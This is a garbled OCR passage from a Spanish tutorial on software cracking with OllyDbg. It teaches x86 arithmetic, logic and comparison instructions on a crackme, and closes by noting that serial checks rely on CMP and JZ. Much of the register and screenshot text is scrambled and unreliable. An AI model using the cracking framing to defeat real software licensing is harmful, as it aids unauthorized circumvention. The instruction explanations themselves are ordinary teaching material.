Lo mismo ocurre con DEC podemos escribirlo debajo del anterior 


| CEMELE epa] vis] $00) 1] + ujejmitiwu[c]/]k[8]R]»..] 


INC ERX 
de DEC EAX 
En FFo46008 — [CALL <JMP.SKERNEL32. GetModu leHandleA> 


MOV DWORD PTR DS: [4026CA7,EAX 
5A 06 PUSH B 
63 PUSH CRACKNME. 004020F4 


PA Ma Arnraraa AMUPPNAAA Piadidia des 


NULL 
"No need to c 
a 


PCOTEBOS nt 
7FFDEGGO 

SP BO12FFC4 
EBP OO12FFFO 
ESI FFFFFFFF 
EDI 70920738 ntdl 
EIP 60401002 CRAC 
CÓó ES 60; 
Pi CS 001B 


dl 


También se pueden incrementar o decrementar el contenido de posiciones de memoria 


lalo CPE ES ESPE Jo A 


PUSH O 
PUSH FRAFCKME. AAJAZAFA 


6A Ub 
AR FI2A4ARA 


Aunque en este caso la sección no tiene permiso de escritura y no dejara aumentar el contenido dando 
excepción. 


command BE Fr y| 


— violation when writing to [00405000] - use Shift+F?¿F8/F9 to pass exception to program 


Si la sección hubiera tenido permiso de escritura, vamos en el dump a la dirección 405000 


así 


Este fue el caso para DWORD sumándole UNO a los 4 bytes del contenido. 


En el caso de WORD el ejemplo sumaria solo a los últimos 2 bytes 


ELIJE SMIEES vie] $0] + Ljejmitiwjo 


5041 INC WORD PTR DS: [405000] 
CI PTR DS: [4026CA],EAX 


5A 06 
£2 Fá?adana (PISA PROFCKME ARAAPAFÁ 


Y en el caso de BYTE sumaria solo al último byte 


EEES A AAA A a 


NOP 
La rasa PTR DS: [4020CA],EAX 
PISA PROPKME ARAASAFA 


z a 5n 46 
ATAR 2 Fá?ndana 


ADD 


Add como ya vimos es la instrucción correspondiente a la suma, siempre suma ambos operandos y 
guarda el resultado en el primero. 


ADD EAX,1 es similar a INC EAX 
También puede sumar registros 


Veamos en OLLY 


CEEA EJE dije] Hu: al +) 1/2jm]1/w]H/ e] 


ADD E 
ES. Fro40000 CALL Che - EKERNELSZ. GetModu leHandleA> 
AS 3 Caca4ana MOU, DWORD PTR DS: [4626CA],EAX 
L 


Antes de ejecutar la operación 


En mi maquina EAX vale 00000000 y ECX vale 12FFB0 en sus maquina puede tener otros valores, 
pueden cambiarlos si quieren, pero al apretar F7 sumara ambos y guardara el resultado en EAX, veamos 


EBP O012FFFO 
ESI FFFFFEFF 
EDI 7092073 


NDDO 
500 


Allí esta EAX esta en rojo pues fue el que se modifico y tiene el resultado de la suma. 


También podemos sumar a un registro el contenido de una memoria 


[€] File View Debug Plugins Options Window Help 


E En ESE ESPE al ES L/Ejm|T]w]Hjc 


NOP 

MOU DWORD PTR DS: [4026CA7,ERX 
PUSH B 

PUSH CRACKME. B04020F4 


OA 


le 


En este caso no hay problema por el permiso de escritura ya que como EAX cambiara y guardara el 
resultado y el contenido de [405000] no cambiara ya que es el segundo operando, la operación no 
generara excepción. 


i 
eL 


5A Ub 
68 F4204000 


Antes de apretar F7 vemos que EAX vale 0 y el contenido de 405000 vale 00001000 


2 BBBBBBDO 
OB12FFES 
7C91EB94 nt 
"FEO4OBb 
SP BB12FFC4 

> BB1ZFFFO 
PREFFEER 


ACA T (añ ra 


ntdll. 
a) 


8 ntdll. 
EIP au4a1006 CRACK 


Entonces EAX=0 mas 1000 se modifica EAX quedando el resultado allí que es 1000. 


Si hacemos al revés y escribimos 


En este caso el resultado se guardara en el contenido de 405000 y esto modificara el mismo por lo cual al 
apretar F7 generara una excepción al no tener permiso de escritura. 


Command (2 8000] y| | 


Access violation when writing to [00405000] - use Shift+F?.F8/F9 to pass exception to program 
mL _ __ >>> >> -- _» -  _ 


ADC (ADD WITH CARRY) 


En este caso se suman ambos operandos y se le suma el valor del CARRY FLAG O FLAG C y se guarda 
en el primer operando. 


OA Cana Araña MOLA AAA ATA MA PARARON PA 


10 00€ 
pur 


¡00 = 


N-=>=: 


JD 


1 
n 
o 


DTD 


EZ. 


Y5155E1S 
ECxX BB12FFEO 
EDX 'DOBBBBZ4 
EBX 7FFO4000 
ESP BB12FFC4 
EBP BO12FFFO 
EST AEFEEEEEE: 
EDI 7C920738 ntdl 


EIP 60461003 CRAC 


56m FA aaa am: 


(FFEFFFF 
FOFOBaL 


Veo que el resultado es 24, pero si repito la operación con el FLAG C puesto a 1 el cual se puede cambiar 


haciendo doble click en el mismo. 


ElFP 4uU4u1003 LH 


B Gs 0068 NU 


B 

MB LastErr ER 
EFL 00009207 (N 
STO empty —UNOR 


OODAFHNNÑNDDO 
o 
m 
mn 
o 
o 
11 
m 
0 
mr 


Allí lo cambie a uno y pongo todo como antes para repetir la operación solo cambiando el flag C. 


Registers (FPU) 

EAX 75155518 

ECX BB12FFEB 

EDX BOBO 

EBX 7FFO40BB 

ESP BB12FFC4 

EBP 0b12FFFAO 

ESI FFFFFFFF 

EDI 7C920738 ntdll.7C9207< 


EIP 60401000 CRACKME. <Modu 


CO ES 0023 32bit B(FFFFF 
P 1 CS 001B 32bit B(FFFFF 
AD SS 0023 32bit BLFFFFF 
Z 0 DS 0023 32bit OLFFFFF 
SO FS 003B 32bit 7FFDFBE 
. g GS 0008 NULL 

DO LastErr ERROR_MOD_NOT 
EFL 00000207 (NO,B,NE,BE,' 


STO empty —-UNORM BCEB B10S 
ST1 empty 0.0 

ST2 empty 6.0 

ST3 empty B. 

ST4 empty BD. 
STS empty D. 
STÓ6 empty 1. 00000000000 
ST? empty 1.0000000BBBBBBE 

32 a 

FST 4026 Cond 15000 Er 
FCW B27F Prec NEAR,53 Ma 


TES 


FFA 
FFF 
738 ntdll.7 


FEF 


bit a 
bit A 


Ya que suma EDX =21 mas 3 mas el FLAG C que en este caso vale 1. 
SUB 


Es la resta o substracción o sea la operación contraria a ADD, lo que hace es restar el segundo operando 
al primero y guardar el resultado en el primer operando. 


ey Aj "pan >= Fs] $3) 31 "Sl HMNN HO 000 O 0 E E E 


[2] NOP 
AS CA204060 (MOV DWORD PTR DS: [4020CA].EAX 


En mi maquina los registros valen antes de ejecutar 


E] 
= JECX BO12FFBO 
EDx 0004BBZ5 
EBX 7FFDO4000 
ESP BO12FFC4 
EBP BO12FFFO 


ESI FFFFFFFF 
EDI 70920738 Les 
EIP 00401000 € 


CO ES 6623 32k 


Al apretar F7 le restara a EAX que vale cero el valor 2 


EBP OO12FFFO 
ESI FFFFFFFF 
EDI 70920738 nt 


EIP 00401003 CR 
Ci ES 0023 32 


Se aaa 25 
El resultado es -2 que en hexadecimal se representa FFFFFFFE si hacemos doble click en dicho valor 
odify EAX XX 
Hexadecimal 
Signed pa |] 
Unsigned [4294957294 
Char [EF [FF [FF [FE 


coc 


Vemos que corresponde al decimal -2. 


También se pueden restar registros, y posiciones de memoria en la misma forma que lo hicimos con 
ADD. 


SUB EAX,ECX 

Por ejemplo hará EAX-ECX y guardara el resultado en EAX 

Y 

SUB EAX,DWORD PTR DS:[405000] 

Restará a EAX el contenido de la posición de memoria 405000, guardando el resultado en EAX, 
En el caso inverso 

SUB DWORD PTR DS:[405000],EAX 


Ya que el resultado se guarda en el primer operando, si no tenemos permiso de escritura en la sección, nos 
dará una excepción. 


SBB 


Es la operación contraria a ADC, es este caso se restan ambos operandos y se le resta el valor del CARRY 
FLAG O FLAG C y se guarda en el primer operando. 


l=] Pue VIV DELI Pag to MP lo VU IU n= 


mex] e]i] vie] +0) ul +) Ljejmtiwjnfc)7 


00401004 
0040100 


NOP 
MOV DWORD PTR DS: [4026CA7,EAX 


Antes de ejecutar la operación ponemos EDX a 21 y el carry flag a O 


OBDBDGDa 
ECx BO12FFEO 
EDX 60000821 
EBX 7FFDO4000 
ESP 0B12FFC4 
EBP BO12FFFO 
ESI FFFFFFFF 
EDI 7C920738 ntdl 


EIP 00461008 CRAC 


ec ES 0623 32bi 
E CS 0B1B 32bi 
Ai SS B023 32bi 
B DS 6623 32bi 
1 FS B03B 32bi 
a 65 6008 NULL 
B 


o ERRO 
EFL 006Ba292 (NO,! 


STO empty —UNORM 
ST1 emntu ALA 


Al apretar F7 hará EDX-3 y le restara cero del FLAG C 


TaT=T2]5T5T2] 
au12FF 


000008 

7FFD4B00 

DB12FFC4 

O612FFFO 

FFFFFFFF 

70920738 ntdll.7C 


EIP 06401063 CRACKME. 


CM ES B023 32bit Al 
P1 CS 0B1B 32bit Ol 
Ai SS 0623 32bit al 
Z 0 DS 0023 32bit Al 


EAX BOBBBDOS 

ECX BB12FFBO 

EDX 

EBX 7FFD4O 

ESP BO12FFC4 

EBP BO12FFFO 

ESI FFFFFFFF 

EDI 70920738 ntdll.7! 


EIP 60461060 CRACKME 


CM Es 0023 32bit 9 
P1 CS 001B 32bit A 
A1 SS 0023 32bit A 
Z 0 DS 0023 32bit M 
SO FS 003B 32bit 7? 
ul g GS 6068 NULL 

OM LastErr ERROR_M 
EFL 0090900217 (NO,B,N 


STO empty —UNORM BCE! 
ST1 empty 0.0 
ST2 empty 0.0 
ST3 empty 0.8 
ST4 empty 6.8 
STA emntu A.A 


Apreto F7 y ahora hará EDX-3 y le restara 1 del FLAG C 


Registers (FPU) 
EAX BOBBBBAa 
ECX BB12FF 
(s]5]51515] 
EBX 7FFD4006 
ESP BB12FFC4 
EBP BO12FFFO 
ESI FFFFFFFF 
EDI 7C920738 a 


males 


EIP 00461003 CRA 


Co ES 0023 32bit 
Pi CS 0018 32bit 
1 SS 0023 32bit 
B DS 0023 32bit 


En este caso el resultado es 1D. 
MUL 


Bueno hay dos instrucciones para realizar multiplicaciones, la primera de ellas es MUL, la cual no 
considera los signos de los números que va a multiplicar, y usa un solo operando el otro operando es 
siempre EAX aunque no se escribe y el resultado lo guarda en EDX:EAX que quiere decir esto veamos 
el ejemplo. 


Por ejemplo 


MUL ECX 


Esto multiplicara ECX por EAX y guardara el resultado en EDX:EAX y no considerara el signo de los 
operandos. 


Por ejemplo veamos en OLLYDBG 


mex] eli] ei 


1 a] +] 1jejm/r]wjH]c]+/x]8]R] 


ECX 
Es FFo466B0 — (CALL <JMP.*KERNELS2. GetModu leHandleA> 
A eecageda a PTR DS: [4020CA7,EAXx 


Title = NULL 
68 F4204000 — |PUSH CRACKME. 004020F4 (stas: = "No need 
Es A60404666 — |CALL <JMP. USER32.FindtWindowA> FindllindowA 
BECA OR EAX, EAX 


«PA fat ll CUADT PDAFYME araaratíatn 


7FFD4B00 
BO12FFC4 
OOÍ2FFFO 
FFFFFFFF 
70920738 ntdl 


EIP 00401060 CRAC 


C1 ES 6023 32bi 
P10 FS ARIR 22hi-: 


Pongo EAX a FFFFFFF7 y ECX a 9 si realizo la multiplicación en la calculadora de Windows veo que 


E Calculadora E [X) 


Edición Yer Ayuda 


FFFFFFF 
OHez ODec O0ct OBin (O Qwod O Dwod Oword O Byte 


(JD) Le) EJE: )EJE Jl) E] 
«y || los | [ms [1 2 |3 | - fish] no 
(Jl) (e) OE JEJEJEJE) 

a 00000 


E Calculadora E * 
Edición Wer Ayuda 


OQHez ODee ODct OBin ( Qword O Dword O word  Ó Byte 


Din OHyp E 1558 Retroceso CE c 


El resultado es 


E Calculadora 


Edición Wer Ayuda 


dd 


OHez ODec O0ct OBin (O Qword O Dwod O word O Byte 


inv Oh E lá Retroceso CE [rs 
Ps WE Prr Mos 1 Eur dEl 1 a 1 1 Vina ans] 


Y no entra en EAX veamos que pasa en OLLY al apretar F7 


A |Registers (FPU) 
—|] EAX FFFFFFAF 
= (515]5]51515]5)5) 
2 Eo 
EBX 7FFO4090 
ESP aB12FFC4 
EBP 0B12FFFA 
ESI FFFFFFFF 
EDI 7C920738 ntdll.” 
EIP 00401003, CRACKM! 


Ei 


Allí vemos en rojo que EDX y EAX cambiaron y como vemos guarda en EAX los bytes que entran allí y 
luego guarda los que no entran en EDX, en este caso el 8 que no puede mostrar EAX, lo guardo en EDX, 
por eso se dice que en este caso el resultado se muestra en EDX:EAX ya que usa ambos como si fueran 
un solo registro del doble de largo. 


En el caso 
MUL DWORD PTR DS:[405000] 


Multiplicara el contenido de 405000 por EAX y como siempre guardara el contenido en EDX:EAX sin 
considerar el signo de los operandos. 


Siempre que en OLLY queramos ver cuanto es el valor de un numero hexadecimal sin signo, hacemos 
doble click en cualquier registro 


Hexadecimal 
Signed (-81 

Unsigned 4294967215 
A A PP 


coca 


Como habíamos visto la segunda línea nos daba el valor con signo en este caso FFFFFFAF es -81 
considerado con SIGNO, pero en operaciones como MUL donde los números se consideran SIN SIGNO 
el valor decimal se lee en la tercera línea la que dice UNSIGNED, allí vemos 4294967215 seria el valor 
tomando al numero como positivo o sin SIGNO. 


IMUL (multiplicación con signo) 
La instrucción IMUL no solo es multiplicar con signo de la misma forma que lo hacia MUL 
IMUL ECX 


Es igual que antes ECX por EAX y el resultado se guarda en EDX:EAX salvo que se considera el signo 
de los operandos. 


Además de la similitud con la instrucción anterior IMUL permite poner mas de un operando, lo que no 
estaba permitido en MUL. 


Del tute de CAOS 

Además de la utilización de los registros EAX y EDX, así como de sus subdivisiones, pueden 
especificarse otros orígenes y destinos de datos y puede haber hasta tres operandos. El primero, es el lugar 
donde se va a guardar el resultado, que debe ser siempre un registro, el segundo y el tercero son los dos 
valores a multiplicar. En estos ejemplos vemos como estas instrucciones con dos o tres operandos, tienen 
el mismo espacio para el resultado que para cada uno de los factores: 

F7EB imul ebx EAX x EBX -> EDX:EAX 

Este primer ejemplo es el conocido y similar a MUL salvo que se consideran los signos 


696E74020080FE imul ebp, dword ptr [esi+74], FF800002 [ESI+74] x FF800002 -> EBP 


Este es el segundo ejemplo que pone veamos en este caso hay tres operandos, multiplica el contenido de 
ESI+74 por FF800002 y el resultado lo guarda en EBP, podemos hacerlo en OLLY 


Copio la linea imul ebp, dword ptr [esi+74], FF800002 al OLLY 


Assemble at 00401000 
fimul ebp. dword ptr [esi+74], FFSD0D02 v 


4 Fill with NOP's Cancel 


Veo que al apretar ASSEMBLE me da error y eso es porque en el OLLY los números que empiezan por 
letras deben agregársele un cero delante si no, no los interpreta, corrijamos 


Assemble at 00401000 


4 Fill with NOP's Cancel | 


Ahora apreto ASSEMBLE y lo acepta 


A] Ej00] 2 $34 21 == MU E O 
TMUL EBP.DWORD PTR DS:[ESI+741,FFS00082 
MOU DWORD PTR DS: [4020CA],ERX 

PUSH 8 

PUSH CRACKME. B04820F4 

CALL _<JMP. 2USER32.FindllindowA> 

OR EAX, EAX 

JE_SHORT CRACKME. 09401010 


E 
a 
E 


DOE 
an 
DOE 


63 F4204000 

ES A6040000 

BECA 
INEA 


DO: 


O 
o 
- 
D 


Cambio el valor de ESI a 401000 para asegurarme que la dirección ESI mas 74 exista y se pueda leer su 
contenido 


FFFFFFAF 
ECX BOBBBBa9 
EDxX B000BBaS 
EBX 7FFO4000 
ESP 0B12FFC4 
EBP BO12FFFO 

0401000 


EDI 7C920738 nt 
EIP 00401002 CF 
C 1 ES B923 3: 


1 Fo aaiD 27 


Veamos en la aclaración del OLLY 


. ES CCO34BBa 
A3 


DS: [0664601074 ]=C 7000000 
EBP=0012FFFO 


Alli nos dice que ESI + 74 es la dirección 401074 y que su contenido es C7000000, veamos en el dump 
con GOTO EXPRESSION 401074. 


: 49 00 ES F3 03 BB|d 
6A 60 FF 35 CA 20 40|. 
6 6A 00 63 06 30 

BG 6s 00 36 06 06 $A 


-|6E 68 E4 60 060 00 és 06 


¡0168 66 6A 66 Es 
CC 63 06 60 AS 04 20 401 Ir4. 


DO 
aaa 


( 


Y si, es cierto el contenido leído al revés seria C7000000, eso lo multiplicara por FF800002 y como el 
primer operando es EBP pues guardara allí el resultado 


imul ebp, dword ptr [esi+74], FF800002 


Al apretar F7 vemos que se puso rojo EBP ya que ahora contiene el resultado 


A |Registers (FPU) 
Ax FFFFFFAF 


EBX 7FFD40B0 
ESP BB12FFC4 
EBP SEG0BBaBDO 
OBIB1B0S CRACKI 
rC920738 . 


C9206738 ntdll 


El resultado en la calculadora nos da C7000000 * FF800002 


E Calculadora 
Edición Wer Ayuda 


| C69C8001 8 000000 


(He: ODec ODct OBin (6 Qwod ÓODwod ÓOwWod  Ó Byte 


HT Ire Q]Hyp 5 | | Retroceso [| CE | | (e | 


Pero como especificamos que se muestre en EBP pues solo muestra los bytes que caben allí, el resto los 
descarta. 


En el tercer ejemplo que hay solo dos operandos se multiplican ambos y el resultado se guarda en el 
primero. 

OFAF55E8 imul edx, dword ptr [ebp-18] EDX x [EBP-18] -> EDX 

Como vemos la mejor opción para multiplicar números largos es usando IMUL con solo un operando 


pues en este caso el resultado lo guarda en EDX:EAX con la posibilidad del doble de largo lo cual no 
ocurre cuando usamos dos o tres operandos, dichas opciones son mas útiles en operaciones pequeñas. 


DIV (Unsigned Divide) / IDIV (Signed Divide) 

Estos son la contrapartida de MUL Y IMUL respectivamente 

DIV solo tiene un operando y no considera los signos y el resultado se guarda en EDX:EAX 

IDIV siempre considera los signos si usa un solo operando será como DIV y guardara en EDX:EAX y en 
el caso de dos operandos dividirá ambos y guardara en el primero, y en el de tres operandos dividirá el 
segundo y el tercero y guardara en el primero. 

No creo que sea necesario repetir los ejemplos pues son similares a los de MUL e IMUL. 

XADD (Exchange and Add) 


Es como realizar en una sola instrucción XCHG y ADD o sea que si tenemos 


XADD EAX,ECX 


[Eo ra Y Ivy LILIA U Ls LL > ud dl > VU MAL U A 


E A — ESE = ES) LEN El] 2] 1/Elm T|[w)|H|c]/ 


N 
MOU DWORD PTR DS: [4920CA],EAX 


7FFO4000 
ESP 0B12FFC4 
EBP 3E000008 
ESI 60461000 CR 
EDI 7C920738 nt 


EIP 00461003 CR 


CO ES 0023 32 
Pi CS 001B 32 
AB S5 BB23 32 
Zz 6 DS 6023 32 
SO FS 003B 32 
TO 65 0000 NU 


Allí vemos ECX que es 1 y EAX es 7 al apretar F7 se intercambian o sea que EAX pasa a valer 1 y ECX 
9 luego se suman 


A |Registers (FPU) 
SS EXT 
= | ECX 00BBBBB9 
——JEDX 00004BaS 
EBX 7FFD4009 
ESP BB12FFC4 
EBP 3E00000a 
ESI 60401000 CR 
EDI 7C920738 nt 


EIP 00401003 CR 


= BM ES 0023 32 
1 CS 0b1B 32 
A 9 $S 8023 32 


Como vemos el resultado se sigue guardando en el primer operando, lo único que cambio fue que se 
intercambiaron los valores antes de sumarlos, vemos que ECX quedo valiendo 9 que era lo que valía 
EAX antes de intercambiarse y sumarse. 


NEG 


Esta instrucción tiene la finalidad de cambiar de signo el número representado o sea que si tenemos el 
número 32 en hexa y le aplicamos NEG el resultado será el negativo del mismo. 


Ejemplo 


FEE An] +. Hu) + 19] T/¡wn)c] 


F7DS G EAX 

ES FFO46000 CALL <JMP. 8¿KERNEL32. GetModu leHandleA> 
AS CA204000 — [MOV DWORD PTR DS: [4020CA],EAXx 

6A 4a PUSH B 

63 F4204000 — [PUSH CRACKME. 004020F4 

ES A6046606_— |CALL <JMP.SUSERS2.FindllindowA> 


Escribo en OLLY NEG EAX y pongo en EAX el valor 32 


EDI 7C920738 nt: 
EIP 06401060 CR 


CO ES 6023 321 
P1.7 FS ARIR 221 


2 

15Js 5151515155) 
EDx 0B04BaaS 
EBX 7FFDO4000 
ESP BO12FFC4 
EBP 2E000000 
ESI 606401060 CRAC 
EDI 7C920738 ntdl 


EIP 606461062 CRAC 
C 1 ES 0023 32bi 


ln 1> 


Hexadecimal 

Signed 50. 
Unsigned [4294967246 
Char [EF [FF [FF [CE 


co 


Allí vemos el resultado -50 en decimal como nos muestra la segunda columna corresponde a -32 en hexa. 


11411109] (4 6L YU YU YU YU Eb 14) TLEEEEUN 


Command ?-32 e w|rS0.(FFFFFFCE) 


_— 5 


Allí esta si tipeamos en la comandbar que nos de el valor de -32 hexa en decimal, nos dice -50 y nos 
aclara que se escribe FFFFFFCE ya que no se puede escribir el signo en OLLY. 


Pues como vemos la instrucción NEG nos convierte el operando en su negativo. 
INSTRUCCIONES LOGICAS 


Provienen de realizar operaciones lógicas entre dos operandos pasados a binario bit a bit y guardando el 
resultado en el primer operando 


AND 
El resultado es 1 si los dos bits son 1, y O en cualquier otro caso. 
land1=1 


1and0=0 
0and1=0 


0and0=0 
Vemos un ejemplo en OLLYDBG 


AND EAX,ECX 


PEA IS AS SI 2 — RS E ES HE E 


AND ECx, ER 
CALL <JMP. *KERNEL32. GetModu leHandleA> 


MOU DWORD PTR DS: [4020CA],EAX 
PUSH A 


ES FFO40000 
As 


£0 ar 


aAnRdA1 ARAS 


Pongamos ECX=0001200 y EAX=3500 


[5] 
ESI 60401000 CRACK 
EDI 7C920738 ntdll. 


EIP 60461002 CRACK 
C1 ES 0023 32bit 


Zz 6 DS 6623 32bit 


Si lo hiciéramos a mano deberíamos pasar a binario ambos 


1200 en binario seria 01001000000000 
3500 en binario seria 11010100000000 


Aplicándole la tablita de la operación AND bit a bit vemos que por ejemplo la ultima cifra 


1200 en binario seria 010010000000 
3500 en binario seria 110101000000 


Al hacer AND entre dos ceros el resultado seria cero, así hay que hacer bit a bit y nos daría 


01000000000000 ya que el resultado es uno solo cuando los dos bits son 1 y eso ocurre solo en 
la columna resaltada. 


1200 en binario seria 01001000000000 
3500 en binario seria 11010100000000 


0100000000000. 


Si ejecutamos F7 en el OLLY vemos el resultado en ECX que es 1000 que pasado a binario es 
01000000000000 


Registers (FPU) 
Ar BUBB3S0b 
ECX BABB1OBA 


ul 


CO ES MB23 32bi 


DA FS ARID 23: 


OR 


En esta instrucción realizamos el mismo proceso que la anterior solo que en vez de utilizar la tablita AND 
para hallar el resultado entre bits, lo hacemos con la tablita OR 


El resultado es 1 si uno o los dos operandos es 1, y O en cualquier otro caso. 


lor1i=1 
lor0=1 
0or1=1 
Dor0=0 


XOR 


Aquí es similar solo que usamos la tablita de la función XOR para las operaciones entre bits 


El resultado es 1 si uno y sólo uno de los dos operandos es 1, y O en cualquier otro caso 


1lxor1=0 
1xor0=1 
Oxor1=1 
Oxor0=0 


Simplemente invierte el valor del único operando de esta función 


not1=0 
not0=1 


Ejemplo: not 0110 = 1001 
Si tenemos por ejemplo EFAX=1200 que en binario es 1001000000000 convertimos los O en 1 y los 1 en 0 
considerando que es un numero de 32 bits y que al inicio tiene ceros o sea seria llenado de ceros delante 
hasta completar los 32 bits. 
00000000000000000001001000000000 
Al hacerle NOT quedaría 
11111111111111111110110111111111 


que en la calculadora de Windows vemos que es FFFFEDEFF en hexa 


[c] File View Debug Plugins Options Window Help 


MOU DWORD PTR DS: [4026CA],EAX 


6A 06 PUSH B 
68 F4204000  |PUSH CRACKME. B04020F4 
Es A6046BB0B — |CALL <JMP.2USERS2.FindllindowA> 
BECO OR EAX, ERX 
v?4 Bl JE_SHORT CRACKME. 604010810 


4]. C3 
Is Cros 64204000 MOV DWORD PTR DS: [402064], 4003 


En OLLY antes de apretar F7 pongo EAX a 1200 


CRACK 
ntdll 


dado 


y 5 00 


 BO4B10B2 


Vemos que el resultado es el mismo 

Bueno aquí terminamos esta quinta parte veo que esto es un poco mas largo de lo que pensaba pero bueno 
vamos paso a paso, nos quedan ver las comparaciones, los saltos y los call y ret. 

Bueno paciencia que despacio se llega a ROMA 


Hasta la parte 6 
Ricardo Narvaja 


14 de noviembre de 2005 


INTRODUCCION AL CRACKING CON OLLYDBG PARTE 6 


COMPARACIONES Y SALTOS CONDICIONALES 


En términos generales, las comparaciones entre dos operandos, y según el resultado de esa comparación 
la decisión si el programa saltara o no en un salto condicional posterior, suele ser lo primero que se 
menciona en cualquier tute básico que comienza desde cero de cracking. 


Sabemos que si el programa nos pide un serial para registrarnos, en algún momento deberá decidir si es 
correcto no y para ello deberá comparar y realizar uno o varios saltos y la dirección adonde saltará variará 
según si pusiste bien el serial o no. 


Ahora como funciona en profundidad la comparación y el salto es lo que veremos a continuación. 


Sabemos porque lo hemos visto ya en partes anteriores de esta introducción, que según el resultado una 
instrucción se activan o desactivan los flags, el caso mas conocido es el flag que se activa cuando el 
resultado de una instrucción es cero el FLAG Z y hemos visto diferentes formas de activar los flags según 
el resultado de una instrucción. 


CMP 


Esta es la instrucción mas conocida de comparación y lo que hace es comparar dos operandos, en realidad 
es una instrucción SUB, que no guarda el resultado de la resta en el primer operando, ambos operandos 
quedan igual, lo que cambian son los flags según el resultado. 


Como vimos si hacemos por ejemplo 
CMP EAX, ECX 


Siendo EAX y ECX iguales, se restan ambos, no se modifican, pero el resultado de la resta es cero lo que 
hace activar el flag Z, veamos el ejemplo en OLLYDBG. 


EXEC dla 4E al +] 1JEjm/T/w)Hj: 


3BC1 CMP EAX, El 
90401982 Es FFO40000 VB 2dAb. SKERNELGZ. GetModu leHandleA> 
AS CA204000 U DWORD PTR DS: [4026C0A],ERX 
6A Ub PUSH 12] T 
68 F4204000 [PUSH CRACKME. B04020F4 [ 
Es A6046BBB — (CALL <JMP.¿USERS2.FindWindowA> 
DECO OR EAX, ERX 
v74 Bl JE SHORT CRACKME.0040101D 


. [3 
% PAR £dá?AdARA! MALL AMARA PTR Mas FáriraAdl dana 


an4B1m18 
00401B1A 
BB4B1B1C 
anñda1a1in 


Allí escribí la instrucción y ahora modificare EAX y ECX para que sean iguales. 


7C91EB94 ntdl 
YFFDAGOS 


BO12FFC4 
OO12FFFO 
FFFFFFFF 
70920738 ntdl 


EIP 00461006 CRACt 


Co ES 0023 32bi1 
Pi CS 0016 32bi1 
AB SS 0023 32bi1 
21d DS 023 32bi1 


A apretar F7 veo que EAX y ECX no modificaron su valor pero se activo el flag Z, al haber realizado una 
resta y ser su resultado CERO aunque no podamos ver el resultado ya que no lo guarda. 


Registers (FPU) 


7C91EB94 ntdll.K 
7FFDAGOS 
BO12FFC4 
BOL2FFFO 
FFFFFFFF 
70920738 ntdll.7 


004610062 CRACKME 


CO ES 0023 32bit M 
P1 CS 0618 S2bit B 
A SS 0023 32bit B 
DS 0623 32bit B 
FS 063B 32bit YI 
B GS 0068 NULL 


B 
DO LastErr ERROR_MI 
EFL 00000246 (NO, NB, | 
STO empty —UNORM BCE! 


En realidad no nos importa el resultado numérico de la resta en si, sino que de alguna forma podemos 
saber según los flags si EAX era igual a ECX, o si son desiguales, cual es mayor. 


Como comentario ya que aun no hemos llegado a los saltos condicionales, los tienen dos posibilidades, 
deciden si saltar o no saltar según el estado de los flags, el mas claro ejemplo y que trabajaría en conjunto 
con la comparación anterior es el salto JZ que salta si el FLAG Z esta activo o a UNO y no salta si esta 
inactivo O a CERO. 

De esta forma se logra que el programa tome una decisión, si fueran dos seriales que esta comparando, 
por ejemplo en EAX esta el serial que vos ingresaste para registrar un programa y en ECX esta el serial 
correcto, el programa podría decidir con un CMP que si son iguales se activa el flag Z, y el salto JZ al ver 
el flag activo, nos llevara a una zona para usuarios registrados, y si el serial que tipeaste y esta en EAX no 
es igual al de ECX que es el correcto, seguí intentando jeje, el flag Z sigue a CERO, y no salta 
manteniéndote en la zona de usuario no registrado. 


Ya veremos los ejemplos más concretos al estudiar los saltos condicionales. 


De la misma forma con el flag S o de signo podemos ver si en una comparación el primer operando era 
mayor que el segundo, o al revés. 


Miremos el ejemplo 


Repitamos el CMP EAX, ECX pero ahora pongamos EAX mayor que ECX 


Registers (FPU) 


' YC91EB94 ntdll 


Si apretamos F7 


EIP p04B1992 CRACH 
Ca Ss bit 
PRE bit 
AB SSO bit 
2 a DS a bit 
SO FSO bit 
TO 650 NULL 
DO 

OB  LastErr ERROR_ 
EFL BBBBBZ06 (NO, NE 
STO empty HOR BC 


ST3 empty 8.0 


Vemos que el FLAG Z es cero por lo cual ya sabemos que no son iguales, y a la vez el flag S es cero lo 
cual quiere decir que al hacer la resta EAX-ECX el resultado es positivo, lo cual significa que EAX es 
mayor que ECX., 


De la misma forma si repetimos la operación con EAX menor que ECX 


X 
7C91EB94 ntdll.K 
Xx 7FFDABOD 
BOL2FFC4 
OOL2FFFO 
FFFFFEFF 
70920738 ntdll.7 


604010006 CRACKME 


Pra EC 1ma22 27hi+ (a 


Y apretamos F7 


EIP 60401002 


ES 4623 
Cs 6B1B 
Ss 4B23 
DS 64623 
FS 063B 
GS 0000 


LastErr 
EFL 00000287 


OOANRNDDO 
DO 


AO 


Allí vemos que al dar la resta de EAX con ECX negativa ya que ECX es mayor, se activa el FLAG S que 
recordamos se activa con resultados negativos. 


Las diferentes posibilidades de comparación activaran los correspondientes flags y según lo que el 
programa necesite saltara o no de acuerdo a chequear la activación de uno o mas de dichos flags. 

También permite la comparación entre registros y posiciones de memoria utilizando DWORD, WORD y 
BYTE. 


AS Lal) e ELE 2 1/Ejm]T/wWHjc)s 


90 NOP 


Allí compararía EAX con el contenido de 405000 y como siempre la ventana de aclaraciones del OLLY 
nos da el valor de cada operando en mi caso 


r 


EAR=O00B0390 


Al apretar F7 en este ejemplo y EAX es menor que el contenido de 405000 que es 1000, dará un resultado 
negativo y activara el FLAG $. 


CAT UNTULUDO LI 


> , 2E 
TO GS 606668 NUL 


O a LastErr ERF 
EFL 60BBB2S? (MC 


CTÍA ararmtra al IND A 


Existen en forma similar 

CMP AX,WORD PTR DS:[405000] 
Y 

CMP AL,BYTE PTR DS:[405000] 


En el caso de comparar 2 bytes o 1 byte del contenido de la memoria. 


TEST (Logical Compare) 


El principio de esta instrucción es, en cierto modo, el mismo de cmp, es decir, una operación entre dos 
valores que no se guarda, sino que puede modificar el estado de algunos flags (en este caso, SF, ZF y PF) 
que determinan si debe efectuarse el salto que también suele acompañar a esta instrucción. La diferencia 
está en que en este caso, en vez de tratarse de una resta, se trata de una operación AND. 

Esto nos dice nuestro amigo CAOS en su tute de ASM veremos ejemplos para aclarar la definición, 
generalmente el comando TEST lo veremos en este formato 


TESTEAX,EAX 


Ustedes dirán para que quiere testearse contra si mismo el valor de EAX o el registro que sea? 
Pues se usa esta instrucción, para saber si EAX en este caso es cero o no, y como funciona? 


Escribamos en OLLY 


TEST EAX,EAX 

esla pel Pel EN All NR 
